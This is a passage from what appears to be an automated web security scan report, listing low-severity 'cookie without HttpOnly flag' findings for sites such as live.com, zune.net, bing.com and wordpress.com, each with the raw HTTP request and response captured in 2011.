Host: segments.adap.tv
Proxy-Connection: keep-alive
Referer: http://bcp.crwdcntrl.net/px?Yz0zNCZweGlkPTExNjgmcHhpZD01MzMmcHhpZD01NzY2JnB4aWQ9NTU2OCZweGlkPTYzOTMmcHhpZD01MyZweGlkPTI0NyZweGlkPTEyODYmcHhpZD01NzQ4
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: rtbData0="key=turn:value=4325897289836481830:expiresAt=Mon+Jul+04+18%3A51%3A56+PDT+2011:32-Compatible=true"; adaptv_unique_user_cookie="-5394452744830899625__TIME__2011-06-30+05%3A43%3A39"; audienceData="{\"v\":2,\"providers\":{\"31\":{\"f\":1311490800,\"e\":1311490800,\"s\":[1953,1952,1950,1966,1949,1960,1947,1962],\"a\":[]},\"9\":{\"f\":1312009200,\"e\":1312009200,\"s\":[1508,528,525],\"a\":[]},\"25\":{\"f\":1310886000,\"e\":1310886000,\"s\":[1996],\"a\":[]},\"8\":{\"f\":1311058800,\"e\":1311058800,\"s\":[1672],\"a\":[]},\"28\":{\"f\":1310886000,\"e\":1339830000,\"s\":[1802],\"a\":[]}}}"

Response

HTTP/1.1 200 OK
Access-Control-Allow-Origin: *
p3p: CP="DEM"
Cache-Control: no-cache
Expires: Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: adaptv_unique_user_cookie="-5394452744830899625__TIME__2011-07-06+04%3A21%3A53";Path=/;Domain=.adap.tv;Expires=Sat, 14-Mar-2043 13:08:33 GMT
Set-Cookie: audienceData="{\"v\":2,\"providers\":{\"7\":{\"f\":1312527600,\"e\":1312527600,\"s\":[1512],\"a\":[]},\"31\":{\"f\":1311490800,\"e\":1311490800,\"s\":[1953,1952,1950,1949,1966,1947,1960,1962],\"a\":[]},\"9\":{\"f\":1312009200,\"e\":1312009200,\"s\":[1508,528,525],\"a\":[]},\"25\":{\"f\":1310886000,\"e\":1310886000,\"s\":[1996],\"a\":[]},\"8\":{\"f\":1311058800,\"e\":1311058800,\"s\":[1672],\"a\":[]},\"28\":{\"f\":1310886000,\"e\":1339830000,\"s\":[1802],\"a\":[]}}}";Path=/;Domain=.adap.tv;Expires=Sat, 14-Mar-2043 13:08:33 GMT
Content-Type: image/gif
Server: Jetty(6.1.26)
Content-Length: 42

GIF89a.............!.......,...........D.;

7.13. https://signup.live.com/signup.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   https://signup.live.com
Path:   /signup.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /signup.aspx HTTP/1.1
Host: signup.live.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Content-Type: text/html; charset=utf-8
Location: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&checkda=1&ct=1309961190&rver=6.1.6206.0&wp=MBI_SSL&wreply=https:%2F%2Fsignup.live.com%2Fsignup.aspx&lc=1033&id=68692
Server: Microsoft-IIS/7.0
Set-Cookie: RPSMaybe=1309961490; domain=signup.live.com; path=/; secure
X-Powered-By: ASP.NET
P3P: BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo
Date: Wed, 06 Jul 2011 14:06:30 GMT
Connection: close
Content-Length: 321

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="https://login.live.com/login.srf?wa=wsignin1.0&amp;rpsnv=11&amp;checkda=1&amp;ct=1309961190&amp;rver=6.1.6206.0&amp;w
...[SNIP]...

7.14. http://social.zune.net/frag/MediaReviewBlock/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://social.zune.net
Path:   /frag/MediaReviewBlock/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /frag/MediaReviewBlock/ HTTP/1.1
Host: social.zune.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
eid: 19ef6009-477e-4f49-b318-45f21f3e4179,857440
X-AspNet-Version: 2.0.50727
lx-svr: S803
X-Powered-By: ASP.NET
Expires: Wed, 06 Jul 2011 14:06:46 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 06 Jul 2011 14:06:46 GMT
Content-Length: 4716
Connection: close
Set-Cookie: EXPAllTREATMENTS=zunenet_music_buyButtonUX=C; domain=.zune.net; expires=Wed, 06-Jul-2011 14:36:46 GMT; path=/
Set-Cookie: EXPCONTEXTHASZUNEPASS=False; domain=.zune.net; path=/

<h2 style=""></h2>
<div id="ajaxErr"></div>
<input type="hidden" id="_comments_hidDelete" /><div class="Pivot"> <a href="#" onclick="ajaxLoader('','&#47;frag&#47;MediaReviewBlock&#47;&#63;_saveRe
...[SNIP]...

7.15. http://social.zune.net/search.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://social.zune.net
Path:   /search.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /search.aspx HTTP/1.1
Host: social.zune.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
eid: 19ef6009-477e-4f49-b318-45f21f3e4179,857422
lx-exp: zunenet_music_buyButtonUX,Force,C
X-AspNet-Version: 2.0.50727
lx-svr: S803
X-Powered-By: ASP.NET
Expires: Wed, 06 Jul 2011 14:06:38 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 06 Jul 2011 14:06:38 GMT
Content-Length: 24089
Connection: close
Set-Cookie: EXPAllTREATMENTS=zunenet_music_buyButtonUX=C; domain=.zune.net; expires=Wed, 06-Jul-2011 14:36:36 GMT; path=/
Set-Cookie: EXPCONTEXTHASZUNEPASS=False; domain=.zune.net; path=/
Set-Cookie: lastCulture=en-US; domain=.zune.net; expires=Tue, 06-Jul-2021 14:06:38 GMT; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/20
...[SNIP]...

7.16. http://social.zune.net/zPage.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://social.zune.net
Path:   /zPage.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /zPage.aspx HTTP/1.1
Host: social.zune.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
lx-svr: S805
X-Powered-By: ASP.NET
Content-Length: 13509
Expires: Wed, 06 Jul 2011 14:06:50 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 06 Jul 2011 14:06:50 GMT
Connection: close
Set-Cookie: lastCulture=en-US; domain=.zune.net; expires=Tue, 06-Jul-2021 14:06:49 GMT; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
...[SNIP]...

7.17. http://spaces.live.com/BlogIt.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://spaces.live.com
Path:   /BlogIt.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /BlogIt.aspx HTTP/1.1
Host: spaces.live.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
X-Imf: ede387e6-6b9a-47e4-9826-4e6371654e4e
Set-Cookie: xidseq=2; domain=.live.com; path=/
Set-Cookie: LD=; domain=.live.com; expires=Wed, 06-Jul-2011 12:26:46 GMT; path=/
Set-Cookie: E=P:vQlOE/0Jzog=:M8dpwUFUPyf3AwZ60baR4PtyqHIUw3ChkgmFA7LS9ZU=:F; domain=.live.com; path=/
X-AspNet-Version: 4.0.30319
Set-Cookie: xidseq=2; domain=.live.com; path=/
Set-Cookie: LD=; domain=.live.com; expires=Wed, 06-Jul-2011 12:26:46 GMT; path=/
Set-Cookie: E=P:vQlOE/0Jzog=:M8dpwUFUPyf3AwZ60baR4PtyqHIUw3ChkgmFA7LS9ZU=:F; domain=.live.com; path=/
Set-Cookie: wla42=; domain=live.com; expires=Wed, 13-Jul-2011 14:06:46 GMT; path=/
Set-Cookie: sc_lpscache_142=; domain=spaces.live.com; path=/
Set-Cookie: sc_clustbl_142=08660009c693a889; domain=spaces.live.com; expires=Fri, 05-Aug-2011 14:06:46 GMT; path=/
X-Powered-By: ASP.NET
X-Content-Type-Options: nosniff
X-MSNSERVER: H: SN2XXXXXC564 V: 1 D: 6/27/2011
Date: Wed, 06 Jul 2011 14:06:45 GMT
Connection: close
Content-Length: 2330


<html>
<head>
<noscript><meta http-equiv="refresh" content="2;url=https&#58;//login.live.com/login.srf&#63;wa&#61;wsignin1.0&#38;rpsnv&#61;11&#38;ct&#61;1309961206&#38;rver&#61;6.1.620
...[SNIP]...

7.18. http://va.px.invitemedia.com/goog_imp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://va.px.invitemedia.com
Path:   /goog_imp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /goog_imp?returnType=image&key=AdImp&cost=ThRFQQAEG8YK5TlPHdsIpCfKn676XEjdI1IuFw&creativeID=124070&message=eJyrVjI2VrJSMDI1NDHQUVAyNgJyzCwNzM1BPEMgRykkI8gtMNDR1d0i0ts0JCfAI6XYs8DR1lYJpBykwNzUyMAcxAPpNQHSpiAzDA0tgUwTIDOvNCcHyDQDiRobWBjXAgC0CRj.&managed=false HTTP/1.1
Host: va.px.invitemedia.com
Proxy-Connection: keep-alive
Referer: http://pubads.g.doubleclick.net/gampad/ads?correlator=1309951294291&output=html&impl=ifr&client=ca-pub-1767463503520867&slotname=Bebo_Home_300x250_ATFLeft&page_slots=Bebo_Home_300x250_ATFLeft&cust_params=Age%3D&cookie=ID%3D5d1731d2d654c623%3AT%3D1309951294%3AS%3DALNI_MYs8-PBIDTpzhXnmr-Aos6FdpkB-w&cookie_enabled=1&url=http%3A%2F%2Fwww.bebo.com%2F&lmt=1309969296&dt=1309951296825&cc=65&biw=1057&bih=822&ifi=1&adk=491404383&u_tz=-300&u_his=2&u_java=true&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=8&u_nmime=43&flash=10.3.181&gads=v2&ga_vid=570193707.1309951297&ga_sid=1309951297&ga_hid=2099858697
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=09035c0c-59c0-487e-ac6a-85a606e2b1c1; exchange_uid=eyIyIjogWyIzNDIwNDE1MjQ1MjAwNjMzMDg1IiwgNzM0MzA4XSwgIjQiOiBbIkNBRVNFQkw2UWZGZE9aQkZ1d0t0cjRtWGN5YyIsIDczNDMwM119; dp_rec="{\"1\": 1308705141+ \"3\": 1308705126+ \"2\": 1308705121+ \"4\": 1305981633}"; subID="{}"; impressions="{\"652209\": [1307361360+ \"673736260435966816\"+ 29712+ 11561+ 12332]+ \"578963\": [1308705142+ \"5582cf52-010b-3f00-a0c2-ce399ddcd498\"+ 3241+ 40464+ 42]+ \"678220\": [1307963585+ \"96c74834-d3fd-3b96-9551-b00ee21c6eae\"+ 7025+ 59171+ 7407]+ \"702131\": [1309234818+ \"6711271471285110655\"+ 160677+ 103577+ 2]+ \"678238\": [1307361357+ \"4303623916581927836\"+ 4478+ 2534+ 12332]+ \"578969\": [1306540018+ \"6628743465197727397\"+ 186+ 789+ 1950]+ \"536719\": [1306540056+ \"4971361720444723341\"+ 29712+ 11561+ 1950]+ \"646575\": [1306535330+ \"2511253520107290994\"+ 174+ 657+ 1950]+ \"691082\": [1308190340+ \"7771034340879608580\"+ 169+ 657+ 2]+ \"648697\": [1305981627+ \"TdeyuAAD1QgK5YAmcxVKhQ==\"+ 115193+ 62482+ 3931]+ \"648698\": [1305981630+ \"TdeyvAAIEhEK5YMHYIpYlA==\"+ 115188+ 62482+ 3931]+ \"678237\": [1309235299+ \"6199351355498244314\"+ 4483+ 2534+ 2]+ \"546680\": [1306514382+ \"8130604638783651597\"+ 174+ 657+ 1950]+ \"578938\": [1306506452+ \"895314541263651941\"+ 186+ 789+ 1950]+ \"690770\": [1308836704+ \"TgNDVQABeU4K7F4GcysJsg==\"+ 63083+ 25140+ 4515]+ \"650395\": [1305746717+ \"aff8f785-6bd0-31ca-97a4-49cafd80eda3\"+ 79272+ 59150+ 7406]+ \"584205\": [1309235459+ \"4153838206207653460\"+ 160819+ 103586+ 2]+ \"642979\": [1309224535+ \"2550584914158478617\"+ 162013+ 105345+ 2]+ \"609770\": [1308705126+ \"4234390b-dad8-3097-8291-83ad77634b5c\"+ 135488+ 76161+ 55]+ \"580191\": [1307361309+ \"6341833618359868224\"+ 29707+ 11561+ 12332]}"; 
camp_freq_p1="eJzjkuGYuIxVgFGiedPSDywKjBrND/d/YDFgtADzuWQ43k5kE+CQeLwBIvt6H5A2YLfYc2sJWHbWDDag3qa1ENmm7ltgvWA+UHbuY5DJ1+8sActef7ETLAvmc4lw3F8M0vugrRcoy6DBYMBgwQAUXTEfpOdbUyuK6Jr/TAJMEs/QRHsXgExoOfv0PbLo64kg0YMPr6OITn4PMvdCw2YU0d8LQaJz0UTvvmQBis740IAiuhPosiyJT++RRUU5Zv5gEWhlllh0GlV411cWgYmMEueW/3+HLDwLaMY1RokrL/+9Qzb67AtWAWaJfU/voYh+fAV23K4LKKKzNoJEb30/iBAFAO4yhgc="; io_freq_p1="eJzjEuboCxNglGjetPQDiwGjBZjmEudYEi/AKfF4A5CjwKDBYMBusefWErDEy3ig6qa1MAlGCzAbKHEnAihx/c4SuASYzSXMcTABKPGgrRcqwWDBwCXCsS1U4CCTxLemViRRYY4fNgJMEs/QBJeB9LecffoeWfBxDFDwQsNmFMELoUDBuWiCTwOAgjM+NLxHtv5HoEArs8Si06iitwIFJjJKnFv+/x2yAZtjBJgl9j29hyJ4FGT/3F0XUAS7w4GCt74fRAgCACVJYIc="; segments_p1="eJwtUU1LAlEUJWcWr7ean9IP6Ce0r7W7Nv6GTFwkzcZokZUxWQRR6oxCH5KbxK9BclGUWkKghpHQEDSBpr1zaHM4nHvPPffdJ3XhFTSpi+0csPETUNidzCl8u4IyaEOJ94GjXkBq4jwk54UVNE4usp6uVJeeSg9oVtAxXVY0T2OZow4n4HsjcOcGfJ/KcRgRZT+gJqaCxvX/xI8xii1l1URNKKjAeHqH5icftTq3rTKzZiIzvCKlKNmakbYSvq6EbAh7D9DRMIGJLUyp0eMOwb1PYHFM5CuSHnh+Br7OjGfm7bD67UB5HyNvtqToZh/UWlT0ls5WEx0u85p0ZnmG+wyqLrOtR+CQb+yw54gblGLw+r/gKZ4nMgW/TANfO1AeHPAkL1HlfpEZVrAFtsmhuKZkKTpR3XiZRHnOPMfbHmOLwH6O16ceLwC/+LW7C/hD3szk9NEB5JSh6Bm72z6E2KqimSb+Z4rk7ob2B83Zo/U="; partnerUID=eyIxMTUiOiBbIjRkY2U4YTUzMDUwOGIwMmQiLCB0cnVlXSwgIjE5MSI6IFsiODQ5NjUzMDYzOTI1MzI1NTgwNiIsIHRydWVdLCAiMTUiOiBbIjAwNDAwMzAwMTQwMDAwMDQ0OTg3MiIsIHRydWVdLCAiODQiOiBbIkZ6NitFUy9jOTlPNno1T0IiLCB0cnVlXSwgIjExMyI6IFsiRlFXV0MyVksyRFdGIiwgdHJ1ZV19

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Wed, 06 Jul 2011 11:21:40 GMT
P3P: policyref="/w3c/p3p.xml", CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Expires: Wed, 06-Jul-2011 11:21:20 GMT
Content-Type: image/gif
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: subID="{}"; Domain=invitemedia.com; expires=Thu, 05-Jul-2012 11:21:40 GMT; Path=/
Set-Cookie: impressions="{\"652209\": [1307361360+ \"673736260435966816\"+ 29712+ 11561+ 12332]+ \"578963\": [1308705142+ \"5582cf52-010b-3f00-a0c2-ce399ddcd498\"+ 3241+ 40464+ 42]+ \"678220\": [1307963585+ \"96c74834-d3fd-3b96-9551-b00ee21c6eae\"+ 7025+ 59171+ 7407]+ \"650395\": [1305746717+ \"aff8f785-6bd0-31ca-97a4-49cafd80eda3\"+ 79272+ 59150+ 7406]+ \"678238\": [1307361357+ \"4303623916581927836\"+ 4478+ 2534+ 12332]+ \"578969\": [1306540018+ \"6628743465197727397\"+ 186+ 789+ 1950]+ \"536719\": [1306540056+ \"4971361720444723341\"+ 29712+ 11561+ 1950]+ \"646575\": [1306535330+ \"2511253520107290994\"+ 174+ 657+ 1950]+ \"691082\": [1308190340+ \"7771034340879608580\"+ 169+ 657+ 2]+ \"648697\": [1305981627+ \"TdeyuAAD1QgK5YAmcxVKhQ==\"+ 115193+ 62482+ 3931]+ \"648698\": [1305981630+ \"TdeyvAAIEhEK5YMHYIpYlA==\"+ 115188+ 62482+ 3931]+ \"678237\": [1309235299+ \"6199351355498244314\"+ 4483+ 2534+ 2]+ \"546680\": [1306514382+ \"8130604638783651597\"+ 174+ 657+ 1950]+ \"578938\": [1306506452+ \"895314541263651941\"+ 186+ 789+ 1950]+ \"690770\": [1309951300+ \"ThRFQQAEG8YK5TlPHdsIpA==\"+ 63083+ 25140+ 6119]+ \"702131\": [1309234818+ \"6711271471285110655\"+ 160677+ 103577+ 2]+ \"584205\": [1309235459+ \"4153838206207653460\"+ 160819+ 103586+ 2]+ \"642979\": [1309224535+ \"2550584914158478617\"+ 162013+ 105345+ 2]+ \"609770\": [1308705126+ \"4234390b-dad8-3097-8291-83ad77634b5c\"+ 135488+ 76161+ 55]+ \"580191\": [1307361309+ \"6341833618359868224\"+ 29707+ 11561+ 12332]}"; Domain=invitemedia.com; expires=Thu, 05-Jul-2012 11:21:40 GMT; Path=/
Set-Cookie: camp_freq_p1="eJzjkuG4v5hNgEniSNfFDywKjBpnZgBpA0YLMJ9LhGPiMlYBRonmTUuBsgwaDAYMFgxA0bcT2QQ4JB5vQBaV4Jg1gw2otmntUrBJTd23gCZB1M99DDLl+p0lKKasmA8S/dbUiiK65j8T0D3P0ER7F4DMbjn79D2y6OuJINGDD6+jiE5+DzL3QsNmFNHfC0Gic9FE775kAYrO+NCAIroT6LIsiU/vkUVFOWb+YBFoZZZYdBpVeNdXFoGJjBLnlv9/hyw8C2jGNUaJKy//vUM2+uwLVgFmiX1P76GIfnwFdtyuCyiiszaCRG99P4gQBQCc9nZ9"; Domain=invitemedia.com; expires=Thu, 05-Jul-2012 11:21:40 GMT; Path=/
Set-Cookie: io_freq_p1="eJzjkuY4mCDAJHGk6+IHFgVGjSNrr31gMWC0APO5hDn6wgQYJZo3LQVKMmgwGDBYMAAFl8QLcEo83oAq+DIeqLJpLargnQig4PU7S5AERTi2hQocZJL41tSKovSHDdAZz9AElyUA9becffoeWfBxDFDwQsNmFMELoUDBuWiCTwOAgjM+NLxHtv5HoEArs8Si06iitwIFJjJKnFv+/x2yAZtjBJgl9j29hyJ4FGT/3F0XUAS7w4GCt74fRAgCADwQWy8="; Domain=invitemedia.com; expires=Thu, 05-Jul-2012 11:21:40 GMT; Path=/
Content-Length: 43

GIF89a.............!.......,...........D..;

7.19. https://wordpress.com/wp-login.php

Summary

Severity:   Information
Confidence:   Certain
Host:   https://wordpress.com
Path:   /wp-login.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /wp-login.php HTTP/1.1
Host: wordpress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Wed, 06 Jul 2011 11:21:26 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Vary: Accept-Encoding
Set-Cookie: hiab=on; path=/; domain=.wordpress.com
X-hacker: If you're reading this, you should visit automattic.com/jobs and apply to join the fun, mention this header.
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Wed, 06 Jul 2011 11:21:25 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: wordpress_test_cookie=WP+Cookie+check; path=/; domain=.wordpress.com
Content-Length: 3666

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en">
<head>
   <meta
...[SNIP]...

7.20. http://www.bing.com/search

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /search

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /search?q=presspass%20controls&FORM=MSSBMN HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private, max-age=0
Content-Type: text/html; charset=utf-8
Expires: Wed, 06 Jul 2011 11:19:45 GMT
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
X-UA-Compatible: IE=7
Date: Wed, 06 Jul 2011 11:20:45 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: _SS=SID=E9BAB4C7FF984C72A2A7D8BEAEA22874; domain=.bing.com; path=/
Set-Cookie: MUID=067CC8A94F2C44DCA6EE1FBCBC8D44CF; expires=Fri, 05-Jul-2013 11:20:45 GMT; domain=.bing.com; path=/
Set-Cookie: OrigMUID=067CC8A94F2C44DCA6EE1FBCBC8D44CF%2c10716aee572d4952b36b2971f6480e26; expires=Fri, 05-Jul-2013 11:20:45 GMT; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&flt7=0&ramp1=snrport4-release&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=D=1846760&MS=1846760&AF=MSSBMN; expires=Fri, 05-Jul-2013 11:20:45 GMT; domain=.bing.com; path=/
Set-Cookie: SRCHUID=V=2&GUID=18047B6C75F646499C286F39250DB552; expires=Fri, 05-Jul-2013 11:20:45 GMT; path=/
Set-Cookie: SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110706; expires=Fri, 05-Jul-2013 11:20:45 GMT; domain=.bing.com; path=/
Content-Length: 35959

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:Web="h
...[SNIP]...

7.21. http://www.bing.com/search

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /search

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /search HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Cache-Control: private
Content-Length: 148
Content-Type: text/html; charset=utf-8
Location: /?scope=web&mkt=en-US
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
Date: Wed, 06 Jul 2011 11:20:45 GMT
Connection: close
Set-Cookie: _HOP=I=1&TS=1309951245; domain=.bing.com; path=/
Set-Cookie: _SS=SID=2FDEEE3741EE47F7B94DEA42819A0D90; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&flt7=0&ramp1=snrport4-release&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=D=1846760&MS=1846760&AF=NOFORM; expires=Fri, 05-Jul-2013 11:20:45 GMT; domain=.bing.com; path=/
Set-Cookie: SRCHUID=V=2&GUID=026636356BC841D79F1AE4DB11B04388; expires=Fri, 05-Jul-2013 11:20:45 GMT; path=/
Set-Cookie: SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110706; expires=Fri, 05-Jul-2013 11:20:45 GMT; domain=.bing.com; path=/

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="%2f%3fscope%3dweb%26mkt%3den-US">here</a>.</h2>
</body></html>

7.22. http://www.burstnet.com/enlightn/7111//82F1/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.burstnet.com
Path:   /enlightn/7111//82F1/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /enlightn/7111//82F1/ HTTP/1.1
Host: www.burstnet.com
Proxy-Connection: keep-alive
Referer: http://techflash.com/about.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 56Q8=3CbhLH0eE71Hn7nncNGs58ZzJ-iRGtORm29qwWhWLJGJgcvEZ9HqbVw; TID=16vda0204fei8g; CMP=1Bq.1Dzj^193.1G7W^16w.1ETB^19q.1GB0^1AF.1GB1^15X.1F0r^16U.1F0r^186.1DzU^1As.1EWG^13V.1EXA

Response

HTTP/1.1 200 OK
Server: Apache (Unix)
P3P: policyref="http://www.burstnet.com/w3c/p3p.xml", CP="NOI DSP LAW PSAa PSDa OUR IND UNI COM NAV STA"
Pragma: no-cache
Cache-Control: no-cache
Content-Type: image/gif
Date: Wed, 06 Jul 2011 14:00:51 GMT
Content-Length: 43
Connection: close
Set-Cookie: CMS=/; path=/; domain=.burstnet.com
Set-Cookie: CMP=1Bq.1Dzj^193.1G7W^16w.1ETB^19q.1GB0^1AF.1GB1^15X.1F0r^16U.1F0r^1As.1EWG^13V.1EXA^13v.1EZU; path=/; expires=Fri, 06-Jul-2012 14:00:51 GMT; domain=.burstnet.com

GIF89a.............!.......,...........D..;

7.23. http://www.cadence.com/Community/blogs/fv/archive/2011/07/06/celebrating-the-success-of-the-uvm-world-web-site.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cadence.com
Path:   /Community/blogs/fv/archive/2011/07/06/celebrating-the-success-of-the-uvm-world-web-site.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Community/blogs/fv/archive/2011/07/06/celebrating-the-success-of-the-uvm-world-web-site.aspx?CMP=home HTTP/1.1
Host: www.cadence.com
Proxy-Connection: keep-alive
Referer: http://www.cadence.com/us/pages/default.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_sq=cadencemossprod%3D%2526pid%253Dus%25253Apages%25253Adefault.aspx%2526pidt%253D1%2526oid%253Dhttp%25253A//www.cadence.com/Community/blogs/fv/archive/2011/07/06/celebrating-the-success-of-the-uvm-worl%2526ot%253DA

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
